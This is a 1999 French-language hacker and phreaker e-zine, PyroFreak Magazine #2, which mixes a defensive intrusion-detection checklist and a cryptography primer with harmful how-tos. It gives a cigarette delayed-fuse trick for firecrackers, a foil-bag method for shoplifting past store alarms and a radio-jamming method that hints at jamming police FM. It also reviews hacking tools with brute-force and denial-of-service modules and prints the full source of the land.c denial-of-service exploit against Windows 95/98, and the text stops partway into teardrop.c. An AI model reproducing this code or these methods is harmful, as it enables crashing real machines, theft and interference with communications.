
         -::-Allons y pour la libert d'expression!!!
            _____ _____     _     ______  ______ __ ___      _________
           |:      __ _ \  \  \  /     / |        ____ |    /   ___   |
           |      \__ _\ \  \  \/ ;   /  |;      /_ _/ |   /   /   /; |
           |   ____ __ ___\  \    :  /   |:  _        /   |   /   / : | 
           |: |              /    , /    |, | \     : \   |  :\__/    |
           |; |          ___/ .    /     |. |  \    ;  \  |  ;       /
           |___\         \________/      |___\  \__ ____\ |_________/
            ____ _ ___ __     ___   ___          ______   __    _______
           |:  _ _      ;\   |   \ \   \        /     ;| |  |  /   .  /
           |  |   \_______\  |:  _\ \_ _\      / /|   :| | ;| /      /
          _|  |___   _____   |; |__  ____     / <_|   ,| |  |/    : /
         |_|,  ___| |;   .\  |   __\ \_:__\  /   _     | |        ;/
           |: |     |:  ` /  | :|____  ____  \  / |;   | |  |\     \
           |; |     |, |\ \  | ;     \ \   ;\ \/  |:   | |: | \    .\
           |___\    |__| \_| |________\ \____\    |____| |___\ \_____\
             
                                                   Crdit: __2
26 Fvrier 1999

	Vous devez lire ceci avant d'aller plus loin

Pyrofreakmag (et ses membres) tient a avertir les gens qui vont continuer
a lire le texte qui va suivre: Ont n'est aucunement responsable 
des actes, et meme des penss qui pourraient etre produites par les lecteurs
de ce zine par rapport a nos articles . Nous tenons a mettre cela bien au 
clair. Si vous n'etes pas d'Accord avec cet affirmation, fermer ce texte, 
et effacer le de votre disque dur ou sur tout autres disques. Vous etes
le seul responsable de vos actes.


Comment nous rejoindre?:

Voici les moyens de rejoindre Pyrofreakmag et ses membres.

Soit sur IRC, sur #phreak.fr ,via le serveur undernet.
Soit par e-mail:  

            pyrofreakmag@hotmail.com  | Pour tous les membres            
		neuro@frphreak.com        | Pour rejoindre Neuro
		lordendrix@hotmail.com    | Pour rejoindre Endrix
		darkm0nk@rocketmail.com   | Pour rejoindre [G]r4FX
		NuClEaR@nuc99.com         | Pour rejoindre Nuclear
            fuckyou@ass.hole          | Pour le service des plaintes

Et vener visiter notre site web: http://pyrofreak.cjb.net
ou http://bill.gates.suck.trop.des.fallus.a.mon.gout.usuck.com

Si vous voulez que votre article apparaisse dans le #3, envoyer le a
pyrofreakmag@hotmail.com . Ou si vous avez des questions, des commantaires, 
des suggestions, envoyer les aussi a pyrofreakmag@hotmail.com . SVP, 
pas de question style: Comment hacker ou Comment phreaker?


 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #2              
:                   
|                           TABLE DES MATIERES                                              
'.________  __ __ ___________ ____ ______________ ____ ___ ______ __ __

       TITRE DE L'ARTICLE                        NICK DE L'AUTEUR

      Intro                                            Neuro
      Vous vous etes fait hack ?                      [G]r4FX
      Vol a l'talage                                  Endrix   
      Brouillage de Frquences                         Neuro
      Crytographie                                     [G]r4FX
      Critiques de Programmes                          Endrix
      Finger                                           [G]r4FX
      Encore les VMBs                                  Neuro
      Linux vs Windows                                 Endrix
      Conclusion                                       Neuro

____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #2              
:                   
|                                  Intro                     
'.________  __ __ ___________ ____ ______________ ____Par Neuro__ __

Ce numero a t dur a terminer, pourquoi? C'est simple, on manque 
d'implication de la part de nos lecteurs. Ils nous faut des nouvelles ides,
de nouveaux concepts, pour aider  nous amiliorer, et cela vous pouvez nous
aider grandement. Comment? En nous donnant vos ides, vos articles, des 
commentaires, des critiques, des questions, et cela par les moyens annoncer
plus haut: (e-mail, #phreak.fr , ...). J'espere que pour le numero 3 on va
avoir beaucoup plus d'implication de votre part.

En passant, on essait de faire notre possible pour liminer le plus possible
les fautes d'orthographes, mais plusieurs s'y glissent pareil, alors SVP, vener
pas nous les faire remarquer. En vriter, moi je m'en colisse pas mal des fautes,
c'est le contenu qui compte d'apres moi, chacun son opinion.

J'aimerais revenir sur un de mes trucs dans le #1, parce que j'ai t
capable de retrouver des informations intressantes sur celui-ci.

C'tais le truc qu'on peu se servir d'une cigarette comme mche, voici un 
beau graphique:


                            |=|
                            |=| ---------- filtre
                            |=|
                            | |
                            | |
                            |o| ---------- Trou pour la meche
 cigarette ------------     | |        (Exemple Petard  meche M-80)
                            | |
                            | |
                            | |
                            | |
                            | |
                            | |
                            | |
                            | |
                            |_| ---------- Allumer ici :))

Une cigarette sans avoir t "poffer" dur en moyenne 8 min, planifier votre
"plan" par rapport a cela!


Vous etes seul responsable de vos actes!!

____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #2              
:                   
|                    Vous vous etes fait hack ?
'.________  __ __ ___________ ____ ______________ ____Par [G]r4FX__ __


Intro:  
Depuis le tous premier dbut du protocol tcp/ip et tout ce qui concerne 
l'I-net, une nouvelle race de "warrior" est apparut sur notre plante... 
P-e d'origine humaine ou extra-terrestre... Mais ils savent faire les choses.  
Ils n'ont aucune bombes, aucuns fusils, aucune pes... Leurs seule arme est 
leur connaissances... Voici un petit texte qui dmontre brievment comment 
savoir si on n'a t victime de leur cyber-crime....


A. Rechercher des signes que votre systme peut avoir t attaqu avec
succs 

Examinez les fichiers "log"  la recherche des connexions de provenance inhabituelle ou des
activits non usuelles.

Par exemple, surveillez votre "last log", les processus de comptabilit systme, tous les "logs" 
gnrs par syslog, et d'autres "logs" de scurit. Si votre garde-barrire ou routeur envoit 
des "logs" dans un endroit autre que le  systme victime de l'attaque, n'oubliez pas de vrifier
galement ces "logs". Notez que ceci n'est pas fiable  toute preuve car,  moins que l'enregistrement 
des "logs" ne soit permit qu' la fin du fichier de stockage, beaucoup d'intrus ditent les fichiers de 
"logs" afin de cacher leur activit. 

Cherchez partout sur votre systme des fichiers ayant un "setuid" ou "setgid" (surtout "setuid
root").

Les intrus laissent souvent des copies de /bin/sh ou /bin/time avec "setuid" afin d'avoir un 
accs "root" ultrieurement. La commande UNIX find (1) peut tre utilise pour rechercher des 
fichiers "setuid" ou "setgid". Par exemple, vous pouvez utiliser les commandes suivantes pour 
trouver des fichiers "setuid root" et "setgid kmem" sur tout le systme de fichier: 

     	find / -user root -perm -4000 -print 

	find / -group kmem -perm -2000 -print 

Il est  noter que les exemples prcdents recherchent sur toute l'arborescence de rpertoire, y 
compris les systmes de fichiers NFS/AFS monts. Certaines commandes find (1) supportent l'option "-xdev" 
pour viter la recherche sur ces rpertoires. Par exemple: 

	find / -user root -perm -4000 -print -xdev 

Une autre faon de chercher les fichiers "setuid" est d'utiliser la commande ncheck (8) sur chaque 
partition de disque. Par exemple, utilisez la commande suivante pour rechercher les fichiers "setuid" 
et les fichiers spciaux sur la partition /dev/rsd0g: 

	ncheck -s /dev/rsd0g 

Testez les binaires de votre systme afin d'tre sr qu'ils n'ont pas t modifis.

Il s'est produit par le pass que des pirates ont russi  modifier les programmes du 
systme UNIX tels que login, su, telnet, netstat, ifconfig, ls, find, du, df, libc, 
sync, n'importe quels binaires rfrencs dans /etc/inetd.conf, et autres programmes 
critiques rseau et systme ou tout autres sous-programmes des librairies partageables 
de systme. Comparez les versions sur votre systme avec de bonnes copies telles que 
celles fournies sur les mdias d'initialisation. Soyez circonspect vis  vis de vos 
copies de sauvegarde (backup); elles peuvent elles aussi contenir des chevaux de Troie. 

Les programmes des chevaux de Troie peuvent produire les mmes "checksum" standard et 
date que la version lgitime. C'est pourquoi la commande UNIX standard sum (1) et 
les dates associs aux programmes ne sont pas suffisants pour dterminer si les 
programmes ont t remplacs. L'utilisation de cmp (1), MD5, Tripwire, et autres 
outils "checksum" cryptographiques est tout dsigne pour dtecter ces programmes 
de cheval de Troie,  condition que ces outils "checksum" eux-mmes sont gards dans 
un lieu sr et ne sont pas modifiables par les intrus. En plus, vous pouvez peut-tre 
envisager d'utiliser un outil (PGP, par exemple) afin de signer la sortie gnre par 
MD5 ou Tripwire pour une rfrence future. 

Vrifiez vos systmes, pour ce qui concerne l'utilisation non autorise d'un programme de
monitorisation rseau, communment appel le sniffeur ou sniffeur de paquet.

Les pirates peuvent utiliser un sniffeur pour capter les compte et mot de passe d'utilisateur. 
Pour information sur le sujet, voir l'avis CA-94:01 du
CERT disponible : 

ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks 



Examinez tous les fichiers lancs par cron et at.

Les pirates peuvent laisser des portes drobes (back doors) dans les fichiers lancs par cron ou
soumis  at. Ces techniques peuvent permettre le retour des intrus sur le systme (mme aprs que 
vous pensez que vous aviez russi  redresser votre systme). Vrifiez bien aussi que tous les fichiers 
et programmes rfrencs (directement ou indirectement) par les "jobs cron  et at", et les fichiers 
"job" eux-mmes ne sont pas accessibles en criture pour tout le monde. 



Vrifiez les services non autoriss. 

Examinez les additions ou modifications non autorises dans le fichier /etc/inetd.conf. 
En particulier, recherchez les entres qui excutent un programme "shell" (par exemple, 
/bin/shell ou /bin/csh) et testez tous les programmes qui sont spcifis dans 
/etc/inetd.conf pour vrifier qu'ils sont corrects et n'ont pas t remplacs par des 
programmes cheval de Troie. 

Vrifiez galement les services lgitimes que vous avez dsactivs dans /etc/inetd.conf. 
Les pirates peuvent ractiver un service que vous croyez avoir dsactiv, ou remplacer 
le programme "inetd.conf" par un programme cheval de Troie. 

Examinez le fichier /etc/passwd sur le systme et vrifiez les modifications apportes 
au fichier.

En particulier, recherchez les crations de nouveaux comptes non autorises, les comptes sans 
mot de passe, ou les changements d'UID (surtout UID 0) sur les comptes existants. 

Vrifiez les entres non autorises dans vos fichiers de configuration systme et rseau.

En particulier, recherchez le signe '+' et les noms de machines extrieures dans /etc/hosts.equiv, 
/etc/hosts.lpd, et dans tous les fichiers .rhosts (spcialement root, uucp, ftp, et autre compte systme)
sur le systme. Ces fichiers doivent tre protgs en criture pour tout le monde. De plus, 
assurez-vous que ces fichiers existaient avant toute intrusion et n'ont pas t crs par un intrus. 

Cherchez partout dans votre systme des fichiers inhabituels ou cachs

Ces fichiers dont le nom commence par un point et ne sont normalement pas affichs par la commande 
ls, peuvent servir  cacher des outils et information (programmes de craquage des mots de passe, 
fichiers de mots de passe en provenance d'autres systmes, etc.). Une technique commune sur les 
systmes UNIX est de placer un rpertoire cach dans un compte utilisateur avec un nom inhabituel, 
quelque chose comme '...' ou '.. ' (2points espace) ou '..^G' (2points control-G). Encore, une fois de plus, 
la commande find (1) peut tre utilise pour rechercher les fichiers cachs, par exemple: 

	find / -name ".. " -print -xdev 

	find / -name ".*" -print -xdev | cat -v 

Des fichiers avec '.xx' ou '.mail' comme nom ont t galement utiliss (c'est  dire des fichiers 
qui ressemblent  des fichiers normaux). 

Examinez toutes les machines sur le rseau local lorsque vous recherchez des signes d'une
intrusion 

La plupart du temps, si une machine a t pirate, les autres sur le rseau l'ont t aussi. 
Ceci est spcialement vrai dans le cas des rseaux o tourne NIS et o les machines font mutuellement 
confiance, les uns aux autres,  travers l'usage des fichiers .rhosts ou /etc/hosts.equiv. Vrifiez 
donc toutes les machines avec lesquelles vos utilisateurs partagent des accs via .rhosts. 

__ __ _ _ _______________ ________ ________ __PyroFreak Magazine #2              
:                   
|                            Vol a l'talage
'.________  __ __ ___________ ____ ______________ ____Par Endrix__ __


 Dans ce petit texte, je vais vous expliquer comment ressortir avec un CD, 
un film ou mme n'importe quoi qui a un petit collant magntique dessus 
sans faire sonner l'alarme.

 C'est trs simple parce que tout ce que le collant magnrique fait, c'est
qu'il retourne le signal aux machins trucks qu'il y a  la sortie de presque
toute les boutiques aujoud'hui. Moi je connais une manire de broy ce systme
pour que rien sonne. Je vous rapelle que c'est pour votre connaissance 
personnelle et non pour le pratiquer. 

 Tout ce qu'il faut : - 2 Sac en plastique pareille
                      - Papier d'allunimium

 Bon... Dans un sac, placer de papier d'alluminium partout  l'intrieur 
de manire que quand vos choses vont tomb dans le sac, les objets vont tre
protgs contre les rayons. Aprs, entrer le 2me sac  l'intrieur de celui-ci
pour que personne puisse voir le papier d'alluminium.

 Maintenant, vous tes pret pour aller tout tester. Je vous conseille pour votre
premire fois, d'aller dans une place "B.S." juste au cas ou il arrive quelque chose.
Mais si vous avez bien fait le travail, vous ne devriez pas avoir de problme.

- G00d fuck :)
__ __ _ _ _______________ ________ ________ __PyroFreak Magazine #2              
:                   
|                      Brouillage de Frquences                  
'.________  __ __ ___________ ____ ______________ ____Par Neuro__ __
Il y a quelque temps, j'tais sur le point de terminer un emmeteur-rcepteur
am portatif, (cb). Jusque la tout, etais normal. Mais quand j'eu fini mon 
montage et que je testa mon emmeteur-rcepteur, quelque chose de spcial si
produisi. Vous vous en douter, j'embarquais sur toute les frquences quand 
j'emmetais, pas seulement sur le am, mais aussi la ttvision.(J'Ai pas tester
sur le FM).

Qu'est ce que ca faisais, c'est simple, tout quipement qui utilise les 
frquences m'entioner plus haut. et qui se trouvais a moins de 500 m de
rayon avec l'emmeteur-rcepteur tais tout simplement brouiller. C'tais un
brouillage intermdiaire, ce que je veux dire par ce terme, c'est qu'on
pouvais comprendre quelques mots d'une conversation sur les frquences AM,
mais cela tres difficilement. C'tais identique pour la tlvision, sauf avec
une moins grande influence. PLusieurs lignes brouillais l'cran, mais image
tais encore assez clair. (ici je parle bien entendu d'une rception avec
antenne et non cable, Satellite c a voir). Je me suis pencher sur le
phnomene, et voila ce que j'ai russi a comprendre de ceci.

Mon emmeteur-rcepteur au dpart tais quiper pour voyager (frquences) a
1.5 km de rayon. Ce qui veut dire que la porter de la frquence avais
diminuer de facon considrable, soit 1km. tout a coup, je me souvenu
de quelques choses qui s'tais produit en faisant mon montage. J'avais eu de
la difficulter a souder la frquence variable. J'ai resouder ma frquence, et 
maintenant tout fonctionnais bien, plus de brouillage d'onde. Ce qui veut
dire que le brouillage tais causer par ma frquence qui tais mal installer.
Ce que je veux dire par mal installer, c'est que les broches avais un contact
(tain) entre eux. C aussi simple que ca.

Comment raliser cela plus facilement? Avec un Walkie Talkie (cb pour enfants),
Vous avez juste a relier les 2 broches de la frquence (standart) avec une
goute d'tain. Comment distinguer la frquence? C assez simple, 90% du temps
elle est grisse ou bleu, et rectangle de face, et ovale du dessus. Je sais pas
si vous me suivez, tk. Aller lire un livre d'lectro pour plus de renseignements.

Je garanti pas a 100% que cet technique fonctionne bien, mais d'apres mon 
exprience, ya beaucoup de chance. En passant si cela fonctionne pour le fm,
bein, la police communique par le FM, vous me voyer venir. En passant vous 
pouvez avoir une plus grande porter avec un plus puissant emmeteur (c 
vident). A vous de trouver des utilits a ce projet, qui d'apres moi son 
assez nombreuses, surtout si vous etre un commerant qui vend le cable TV,
hh. J'me comprend.


____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #2              
:                   
|                            Crytographie                     
'.________  __ __ ___________ ____ ______________ ____Par [G]r4FX__ __

Introduction:

Ce texte a t crit, pour qui la crytographie est une difficult dans leurs
taches.  Si vous voulez que vos attaques de Hack ou Crack soit fonctionnelles, 
il va surement falloir un jour que vous faites de l'encryptage/dcryptage. Ce
texte vous montre une bonne partie de ce que vous devez savoir sur la 
cryptographie.


La cryptographie :

L'Internet n'est pas scuritaire! Cette affirmation, plusieurs fois rpte,
risque de crer une vritable paranoa, et rend des gens rticents  utiliser
l'Internet comme moyen de communication. Il existe pourtant une technologie
de pointe qui peut apporter des solutions pour permettre de raliser des 
transactions en toute scurit sur l'Internet. Elle s'appelle la cryptographie.
 

Une transaction, qu'il s'agisse d'un traitement bancaire ou d'un change de 
courrier lectronique est dite scuritaire si elle satisfait aux quatre
conditions suivantes: 

 1.Authenticit des intervenants. Lorsqu'on effectue une transaction, on veut
bien pouvoir s'assurer de l'authenticit de son correspondant. Or,  l'heure
actuelle, le courrier lectronique, la technologie W3 (World Wide Web) 
le permettent, mais c'est pas super fonctionnelle. Dans le cas du courrier
lectronique, il est trs facile pour quiconque de modifier l'en-tte d'un
courrier lectronique qui contient l'adresse de l'expditeur pour se faire
passer pour un autre. Dans le cas du W3, la mascarade de numro IP (IP 
spoofing) pour cacher l'identit de la connexion provenance source est plus
difficile, mais l'entreprise n'est nullement insurmontable. 
   
 2.Confidentialit de la transaction. Le fondement de la communication en
rseau de l'Internet repose essentiellement sur la suite de protocoles TCP/IP
(Transmission Control Protocol/Internet Protocol). Donc, il est trs impor-
tant que TCP/IP soit scuritaire, la version IPv6 plus robuste et plus scu-
ritaire est maintenant utiliser par l'IETF (Internet Engineering Task Force). Toute
L'information qui transite de passerelle en passerelle sur l'Internet
circule en clair. Quiconque fait de l'coute de rseau peut intercepter
les paquets de donnes et accde  l'information dsire. 
   
 3.Intgrit du message. Rien n'assure que le message est intact pendant son
transfert sur le rseau. Il pourrait bien tre intercept et modifi par 
n'importe qui sans que son propritaire s'en rend compte. 
   
 4.Non-rpudiation du message. Ca, ca veut dire la possibilit pour quelqu'un
de renier qu'il est l'auteur du message. Donc l'authentification vient d'tres
corrompu.

Ces quatre conditions de scurit posent de grands dfis  l'Internet qui ,
pour les relever, n'a pas d'autre choix que de faire appel  des techniques
d'encryptage sophistiques que seule la technologie la plus avance de la
cryptographie puisse en procurer. On distingue deux grands types de
mthocryptographiques: 

 1.Mthode  clef secrte ou symtrique, dans laquelle l'algorithme utilis
est connu de tout le monde, mais la clef utilise reste secrte aux parties
et qui sert  la fois au cryptage et au dcryptage. Les algorithmes les plus
connus qui sont classes comme pioniressont DES (Digital Encryption
Standard), Triple-DES, IDEA (International Data Encryption Algorithm), RC2,
RC4, RC5 (Rivest's Code #2, #4 #5), Skipjack etc. Si Alice veut envoyer un 
message  Robert, elle doit convenir avec ce dernier d'un algorithme et d'une
clef. La clef doit tre change de manire scuritaire. 
   
 2.Mthode  clef publique ou asymtrique, dans laquelle l'algorithme est
galement connu des parties, mais chaque partie possde non pas une clef
mais une paire de clefs: une clef publique connue de tout le monde et une
clef prive personnelle, garde secrte. Les algorihmes les plus connus et
ceux qui qui sont classes comme pionires sont RSA (Rivest-Shamir-Adleman),
Diffie-Hellman, Merkle-Hellman, etc. Si Alice dsire communiquer avec Robert,
elle doit convenir avec celui-ci d'un algorithme et lui demande sa clef
publique. Elle crypte son message avec la clef publique de Robert avant de
l'envoyer.  la rception, Robert dcrypte le message  l'aide de sa propre
clef prive. 

La mthode  clef secrte est rapide en terme de vitesse de cryptage/dcryp-
tage, elle exige par contre un canal scuris pour la transmission des
clefs. La mthode  clef publique est lente, cent fois moins rapide que la
mthode  clef secrte, mais elle est plus robuste et dispose des
dispositifs trs scuritaires pour la distribution des clefs publiques
(serveurs, annuaires publics, centres de certification). Dans la pratique,
on utilise conjointement les deux mthodes. Il y a alors deux cryptages.
Lorsqu'Alice veut envoyer un message  Robert: 

     elle demande  Robert de lui fournir sa clef publique; 
     elle gnre une clef alatoire, appele la clef de session; 
     elle crypte le message avec un algorithme symtrique (du type DES, par
          exemple)  l'aide de la clef de session; 
     elle crypte ensuite la clef de session avec un algorithme asymtrique
          (du type RSA, par exemple) en utilisant la clef publique de Robert; 
     elle envoie  Robert le tout, la clef de session et le message, tous les
          deux crypts. 

Robert reoit l'ensemble de clef de session et de message crypts: 

     il utilise sa clef prive pour dcrypter d'abord la clef de session; 
     il utilise par la suite la clef de session obtenue pour dcrypter et
        obtenir finalement le message. 

Le "cryptage avec clef publique/dcryptage avec clef prive" assure la
confidentialit de la transaction. Mais les trois autres critres peuvent-ils
tre satisfaits? La rponse est oui,  condition qu'on ajoute des tapes  la
mthode utilise. En fait, l'intgrit et la non-rpudiation sont rsolues 
l'aide de ce qu'on appelle la signature digitale (ou la signature numrique).
Contrairement au cas d'encryptage o la clef publique sert au cryptage et la
clef prive, au dcryptage; dans la signature digitale c'est inverse: la clef
prive est utilise pour le cryptage et la clef publique, pour le dcryptage.
Le principe est le suivant: 

Lorsqu'Alice envoie son message  Robert, elle envoie galement une signature
digitale: 

     elle utilise d'abord un algorithme spcial, appel "hash algorithm", qui
          transforme son message de longueur quelconque en une chane de 
          longueur constante (un nombre de 128-bit de long). C'est ce qu'on
          appelle un "message digest". Les algorithmes les plus connus
          sont SHA (Secure Hash Algorithm), Snerfu, MD4, MD5 (Message Digest
           #4, #5), etc. L'algorithme ne fonctionne que dans une direction
          et particulirement robuste  l'inversion: il est quasi impossible
          de retrouver le message original  partir du "message digest". 
     elle crypte ensuite le "message digest" avec sa propre clef prive et le
     transmet  Robert. 

 la rception: 

     Robert utilise la clef publique d'Alice pour dcrypter le "message 
digest" pour avoir et le message et le "digest"; il calcule galement 
le "digest" du message reu. 

Si les deux "digest" sont identiques, Robert peut tre certain: 

     que le message n'a pas t altr (intgrit); 
     qu'Alice ne pourra pas rpudier le message, tant donn qu'elle seule
connat sa clef prive (non-rpudiation). 

Il reste l'authenticit. Lorsqu'Alice demande  Robert de lui fournir sa clef
publique, qu'est-ce qui lui prouve que ce n'est pas quelqu'un d'autre
qui lui rpond? Rien, si Robert n'a pas fait auparavant enregistrer sa clef
publique auprs d'une "autorit de certification". La dmarche est
simple: 

     Robert calcule sa clef publique et sa clef prive  l'aide d'un logiciel
utilitaire (Netscape, Oracle, Pretty Good Privacy, etc.); il envoie  un 
organisme de certification (VeriSign, par exemple) sa clef publique avec
d'autres informations personnelles prouvant son identit; 

     L'organisme de certification, aprs vrification auprs d'une tierce 
partie pour s'assurer de l'identit de Robert, met un certificat qui 
comporte, en autres, l'identit de Robert, sa clef publique, la date 
d'mission, etc. Le certificat est sign digitalement par l'autorit 
de certification. 
    
      Alice, lorsqu'elle veut s'assurer de l'identit de Robert, elle 
lui demande son certificat qu'elle vrifie en utilisant la clef publique de
l'autorit de certification. 

La cryptographie  clef publique est la clef des transactions scuritaires
sur l'Internet. Elle donne naissance  plusieurs applications majeures,
parmi lesquelles se trouvent notamment le SHTTP (Secure HyperText Transfer
Protocol) de l'Enterprise Integration Technologies et le SSL (Secure Socket
Layer) de la Netscape Communications Corporation. 



____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #2              
:                   
|                     Critiques de Programmes
'.________  __ __ ___________ ____ ______________ ____Par Endrix__ __



 Bon, hey bien dans ce texte je vais vous dire quels outils de hacking, 
phreaking... sont les meilleurs et lesquels sont poches. Le seul juge est
moi alors il est possible que je me trompe en disant qu'un tel prog est 
poche quand il est super bon.. C'est mon opinion personnelle alors il
faut en prendre et en laisser. Donc dans chaque ezine il va avoir un 
diagnostique sur quelque bon programme.

______________________________________________________________________
Analyse du programme   : Legion 2.11
Auteur(s)              : rhino9
URL de tlchargement  : Http://rhino9.ml.org
Note sur 10            : 7/10
Note(s) du programme(s) : Marche pas tout les coups mais la pluspart du
                          temps ca marche
Option(s)               : - Scan pour des IP's en partage de fichier
                          - Brute Force access mme si le IP a un password
                          - Permet de Mapper Drive
                          - Peut mapper plusieurs IP en mme temps
Fonction(s) du programme : HeY bien ce programme permet de hacker une 
                           personne qui est en partage de fichier et 
                           contient un scanneur inclus.
Commantaire(s) Additionnel(s) : N/A   



______________________________________________________________________
Analyse du programme   : Genius 2
Auteur(s)              : Messiah
URL de tlchargement  : Http://www.sinnerz.com/genius/
Note sur 10            : 10/10
Note(s) du programme(s) : Aucun bug trouv 
Option(s)               : - Internet Clients : - Finger 
    			    	               - FTP
   					       - Internet Browser
 					       - Ping
 					       - SMTP
 				               - Telnet
 					       - Time
 					       - TraceRoute
					       - Whois
                       - Internet tools : - Current Connections
 					  - Download Manager
 					  - Name Scanner
					  - NS lockup
 					  - Patience
				          - Port Info
 					  - Service Scanner
					  - Site Checker
		       - PIM : - Address Book
			       - Note 
 			       - Password
		       - Utilities : - Convertion
				     - Computer Search
				     - Password Generator
				     - UUEncode
                       - Mail Check (avec configuration)
                       - Finger Server (avec configuration)
		       - Ident Server (avec configuration)
                       - PortScan detection (avec configuration)
                       - Port Watcher (avec configuration)
		       - Stay Alive (avec configuration)
		       - HotKeys (avec configuration) 
                       - Help file

Fonction(s) du programme : Alors la, ce programme a plusieur fontions .. Il
                           trs pratique pour plein de chose pour vous trouverez
                           vous mme avec des choses pratiques !!
Commantaire(s) Additionnel(s) : Excellent programme que tout le monde devrait 
                                avoir !!!!



___________________________________________________________________________
Analyse du programme  : Aggressor version 0.99
Auteur(s)             : Aggressor team
URL de tlchargement : http://aggressor.net
Note sur 10           : 10/10
Note(s) du programme  : Souvent quand tu ouvres le programe, il marque
                        Critical Error the program will be unstable now
                        mais moi ca marche toujours bien aprs.
Options(s)            :- Scanner de boite linux et de BSD
                       - Testeur du Buffet Overflow pour le count.cgi
                       - Scanneur du bug dans le CGI de faxsurvey et s'il trouve
                         le bug et dmontre comment un hacker peut gagn l'access
                         au r00t avec ca.
                       - Scan la vulnrabilit dans les scriptsHTML
                       - Scan la vulnrabilit dans les scripts perl
                       - Scan la vulnrabilit des script PHP CGI
                       - Scan pour voir si vous avez et comment auter le bug 
                         du /cgi-bin/test-cgi
                       - Scan la vulnrabilit de votre WWWBoard
                       - Exploit le CGI Guess
                       - coke (denial)
                       - Scan pour l'exploit du login avec Anonymous
                       - Crash un FTP avec le Buffet Overflow 
                       - Scan les FTP de warez
                       - Scan pour le trojan GirlFriend
                       - Hanson (denial)
                       - ICMP Echo killer
                       - Kill votre Ident
                       - Land (denial)
                       - nestea (denial)
                       - NetBUS detector
                       - BackOrifice Scanner
                       - Peut aussi agir comme un FireWall
                       - Donne tout les rsultats dans un beau petit tableau
                         pour que le webmaster puisse tout compredre :)
                       - Et ya plein d'autres choses que j'ai pas encore trouv!!!
Fonction(s) du programme : Sa fonction procipale est de scanner un serveur 
                           pour y trouv des failles que les pirates pourraient
                           exploit afin de gagner le r00t du serveur mais 
                           plusieurs personnes ont fais des librairies addon pour
                           le programme alors la je trouve que c'est plus un 
                           programme de hacking que n'importe quoi d'autre mais
                           il est toujours aussi efficace.... 
Commantaire(s) Additionnel(s) : WAW Super programme mais coute CHER !!(heehe vive le cracking =P)



______________________________________________________________________
Analyse du Script      : Land.c
Auteur(s)              : m3lt, FLC
URL de tlchargement  : Http://www.rootshell.com
Note sur 10            : 8/10
Note(s) du programme(s) : Trs efficace pour le monde qui sont pas patch
Option(s)               : - Crash une machine sous Win95, 98
Fonction(s) du programme : - Crash une machine sous Win95, 98
Commantaire(s) Additionnel(s) : N/A   

Voici le code : 
 
/* land.c by m3lt, FLC
   crashes a win95 box */

#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>

struct pseudohdr
{
        struct in_addr saddr;
        struct in_addr daddr;
        u_char zero;
        u_char protocol;
        u_short length;
        struct tcphdr tcpheader;
};

u_short checksum(u_short * data,u_short length)
{
        register long value;
        u_short i;

        for(i=0;i<(length>>1);i++)
                value+=data[i];

        if((length&1)==1)
                value+=(data[i]<<8);

        value=(value&65535)+(value>>16);

        return(~value);
}

int main(int argc,char * * argv)
{
        struct sockaddr_in sin;
        struct hostent * hoste;
        int sock;
        char buffer[40];
        struct iphdr * ipheader=(struct iphdr *) buffer;
        struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
        struct pseudohdr pseudoheader;

        fprintf(stderr,"land.c by m3lt, FLC\n");

        if(argc<3)
        {
                fprintf(stderr,"usage: %s IP port\n",argv[0]);
                return(-1);
        }

        bzero(&sin,sizeof(struct sockaddr_in));
        sin.sin_family=AF_INET;

        if((hoste=gethostbyname(argv[1]))!=NULL)
                bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
        else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
        {
                fprintf(stderr,"unknown host %s\n",argv[1]);
                return(-1);
        }

        if((sin.sin_port=htons(atoi(argv[2])))==0)
        {
                fprintf(stderr,"unknown port %s\n",argv[2]);
                return(-1);
        }

        if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
        {
                fprintf(stderr,"couldn't allocate raw socket\n");
                return(-1);
        }

        bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
        ipheader->version=4;
        ipheader->ihl=sizeof(struct iphdr)/4;
        ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
        ipheader->id=htons(0xF1C);
        ipheader->ttl=255;
        ipheader->protocol=IP_TCP;
        ipheader->saddr=sin.sin_addr.s_addr;
        ipheader->daddr=sin.sin_addr.s_addr;

        tcpheader->th_sport=sin.sin_port;
        tcpheader->th_dport=sin.sin_port;
        tcpheader->th_seq=htonl(0xF1C);
        tcpheader->th_flags=TH_SYN;
        tcpheader->th_off=sizeof(struct tcphdr)/4;
        tcpheader->th_win=htons(2048);

        bzero(&pseudoheader,12+sizeof(struct tcphdr));
        pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.protocol=6;
        pseudoheader.length=htons(sizeof(struct tcphdr));
        bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
        tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

        if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
        {
                fprintf(stderr,"couldn't send packet\n");
                return(-1);
        }

        fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);

        close(sock);
        return(0);
}



______________________________________________________________________________________
Analyse du Script     : TearDrop.c 11.3.97
Auteur                : route|deamon9
URL de Tlchargement : http://www.technotronic.com
Note sur 10           : 8/10
Note(s) du programme  : heehe sans probleme pour la compilation !!
                        gcc -o2 teadrop.c -o teadrop
Fonction(s)           : Peut fuck n'importe quel machine 
                        Windows 3.1 - Windows 95 - Windows 98
                        Sauf si le PC est patch contre le teardrop
Commantaire(s)        : Voir Bonk.c plus loin :)        

Voici le code : 
 
/*
 *  Copyright (c) 1997 route|daemon9  <route@infonexus.com> 11.3.97
 *
 *  Linux/NT/95 Overlap frag bug exploit
 *
